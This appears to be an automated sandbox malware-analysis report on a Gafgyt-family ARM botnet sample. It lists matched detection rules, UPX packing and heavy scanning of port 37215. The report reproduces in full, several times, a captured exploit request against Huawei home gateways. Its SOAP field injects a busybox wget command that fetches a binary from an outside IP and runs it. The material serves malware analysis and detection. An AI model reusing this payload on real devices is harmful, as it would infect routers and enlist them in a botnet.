          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 450Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 78 74 65 61 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 450Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 78 74 65 61 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: /tmp/arm4.elf (PID: 5678)Socket: 127.0.0.1:47845Jump to behavior
          Source: unknownTCP traffic detected without corresponding DNS query: 41.197.21.187
          Source: unknownTCP traffic detected without corresponding DNS query: 41.171.185.81
          Source: unknownTCP traffic detected without corresponding DNS query: 41.13.27.69
          Source: unknownTCP traffic detected without corresponding DNS query: 41.233.158.37
          Source: unknownTCP traffic detected without corresponding DNS query: 41.26.61.207
          Source: unknownTCP traffic detected without corresponding DNS query: 41.147.245.60
          Source: unknownTCP traffic detected without corresponding DNS query: 41.9.160.229
          Source: unknownTCP traffic detected without corresponding DNS query: 41.217.17.198
          Source: unknownTCP traffic detected without corresponding DNS query: 41.157.30.71
          Source: unknownTCP traffic detected without corresponding DNS query: 41.17.40.118
          Source: unknownTCP traffic detected without corresponding DNS query: 41.57.197.224
          Source: unknownTCP traffic detected without corresponding DNS query: 41.30.180.63
          Source: unknownTCP traffic detected without corresponding DNS query: 41.168.222.225
          Source: unknownTCP traffic detected without corresponding DNS query: 41.250.39.238
          Source: unknownTCP traffic detected without corresponding DNS query: 41.108.29.120
          Source: unknownTCP traffic detected without corresponding DNS query: 41.70.226.69
          Source: unknownTCP traffic detected without corresponding DNS query: 41.96.73.207
          Source: unknownTCP traffic detected without corresponding DNS query: 41.228.223.172
          Source: unknownTCP traffic detected without corresponding DNS query: 41.3.105.71
          Source: unknownTCP traffic detected without corresponding DNS query: 41.7.80.170
          Source: unknownTCP traffic detected without corresponding DNS query: 41.71.6.90
          Source: unknownTCP traffic detected without corresponding DNS query: 41.221.116.9
          Source: unknownTCP traffic detected without corresponding DNS query: 41.199.249.222
          Source: unknownTCP traffic detected without corresponding DNS query: 41.2.2.7
          Source: unknownTCP traffic detected without corresponding DNS query: 41.191.248.212
          Source: unknownTCP traffic detected without corresponding DNS query: 41.69.166.108
          Source: unknownTCP traffic detected without corresponding DNS query: 41.133.22.88
          Source: unknownTCP traffic detected without corresponding DNS query: 41.82.149.213
          Source: unknownTCP traffic detected without corresponding DNS query: 41.236.153.221
          Source: unknownTCP traffic detected without corresponding DNS query: 41.222.209.141
          Source: unknownTCP traffic detected without corresponding DNS query: 41.121.136.85
          Source: unknownTCP traffic detected without corresponding DNS query: 41.29.9.150
          Source: unknownTCP traffic detected without corresponding DNS query: 41.226.150.103
          Source: unknownTCP traffic detected without corresponding DNS query: 41.38.33.67
          Source: unknownTCP traffic detected without corresponding DNS query: 41.43.37.217
          Source: unknownTCP traffic detected without corresponding DNS query: 41.30.29.145
          Source: unknownTCP traffic detected without corresponding DNS query: 41.231.199.48
          Source: unknownTCP traffic detected without corresponding DNS query: 41.59.128.165
          Source: unknownTCP traffic detected without corresponding DNS query: 41.30.114.85
          Source: unknownTCP traffic detected without corresponding DNS query: 41.195.188.129
          Source: unknownTCP traffic detected without corresponding DNS query: 41.12.30.14
          Source: unknownTCP traffic detected without corresponding DNS query: 41.32.89.94
          Source: unknownTCP traffic detected without corresponding DNS query: 41.115.204.181
          Source: unknownTCP traffic detected without corresponding DNS query: 41.80.116.211
          Source: unknownTCP traffic detected without corresponding DNS query: 41.69.146.54
          Source: unknownTCP traffic detected without corresponding DNS query: 41.251.53.244
          Source: unknownTCP traffic detected without corresponding DNS query: 41.7.171.41
          Source: unknownTCP traffic detected without corresponding DNS query: 41.175.9.75
          Source: unknownTCP traffic detected without corresponding DNS query: 41.169.133.197
          Source: unknownTCP traffic detected without corresponding DNS query: 41.246.114.94
          Source: global trafficDNS traffic detected: DNS query: retardedclassmate.dyn
          Source: unknownHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 450Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 78 74 65 61 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: arm4.elf, 5688.1.00007f042c017000.00007f042c036000.r-x.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
          Source: arm4.elf, 5688.1.00007f042c017000.00007f042c036000.r-x.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
          Source: arm4.elfString found in binary or memory: http://upx.sf.net

          System Summary

          barindex
          Source: 5678.1.00007f042c017000.00007f042c036000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
          Source: 5688.1.00007f042c017000.00007f042c036000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
          Source: Process Memory Space: arm4.elf PID: 5678, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
          Source: Process Memory Space: arm4.elf PID: 5688, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
          Source: LOAD without section mappingsProgram segment: 0x8000
          Source: 5678.1.00007f042c017000.00007f042c036000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
          Source: 5688.1.00007f042c017000.00007f042c036000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
          Source: Process Memory Space: arm4.elf PID: 5678, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
          Source: Process Memory Space: arm4.elf PID: 5688, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
          Source: classification engineClassification label: mal92.troj.evad.linELF@0/0@10/0

          Data Obfuscation

          barindex
          Source: initial sampleString containing UPX found: $Info: This file is packed with the UPX executable packer http://upx.sf.net $
          Source: initial sampleString containing UPX found: $Info: This file is packed with the UPX executable packer http://upx.sf.net $
          Source: initial sampleString containing UPX found: $Id: UPX 3.94 Copyright (C) 1996-2017 the UPX Team. All Rights Reserved. $

          Hooking and other Techniques for Hiding and Protection

          barindex
          Source: unknownNetwork traffic detected: HTTP traffic on port 36490 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 38634 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 58802 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 35594 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 55964 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 42700 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 39832 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 53140 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 57098 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 58136 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 52272 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 41018 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 55094 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 51310 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 41374 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 35582 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 43076 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 58926 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 44888 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 51300 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 52806 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 40042 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 54126 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 35692 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 43314 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 46776 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 58906 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 58910 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 39022 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 59806 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 44324 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 44718 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 33546 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 59624 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 55242 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 49592 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 57842 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 39380 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 39660 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 57110 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 47286 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 56740 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 34718 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 53318 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 32880 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 37790 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 32786 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 37500 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 50070 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 35136 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 50750 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 43468 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 55872 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 48116 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 43220 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 56134 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 59004 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 34268 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 47602 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 33566 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 54328 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 56062 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 57650 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 52150 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 56946 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 50760 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 33594 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 39682 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 41306 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 51340 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 47532 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 41054 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 51610 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 39568 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 54000 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 35474 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 43974 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 33220 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 33042 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 56190 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 37568 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 43934 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 50940 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 44618 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 46424 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 58650 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 41036 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 43824 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 50044 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 41618 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 36124 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 39408 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 35100 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 34658 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 44202 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 43926 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 46406 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 49280 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 53018 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 47980 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 52942 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 42328 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 50632 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 42972 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 40166 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 36982 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 37084 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 59614 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 55512 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 37034 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 34662 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 34898 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 35622 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 35722 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 46618 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 60992 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 33572 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 53778 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 49130 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 33508 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 47074 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 36330 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 39064 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 59914 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 54470 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 58098 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 44324 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 60466 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 48462 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 39214 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 39896 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 47634 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 49092 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 60946 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 46996 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 48134 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 41964 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 42166 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 49630 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 47164 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 54714 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 43356 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 38136 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 53580 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 34094 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 38512 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 40940 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 47416 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 41540 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 57162 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 43146 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 34884 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 44080 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 37560 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 37060 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 44032 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 37100 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 54590 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 51352 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 38032 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 60738 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 48270 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 39576 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 38768 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 35684 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 58858 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 38624 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 59290 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 42256 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 39242 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 42656 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 41554 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 60266 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 50626 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 52618 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 54768 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 50094 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 45036 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 41352 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 58920 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 35164 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 57268 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 43266 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 48044 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 57362 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 55310 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 48960 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 32776 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 55052 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 60740 -> 37215
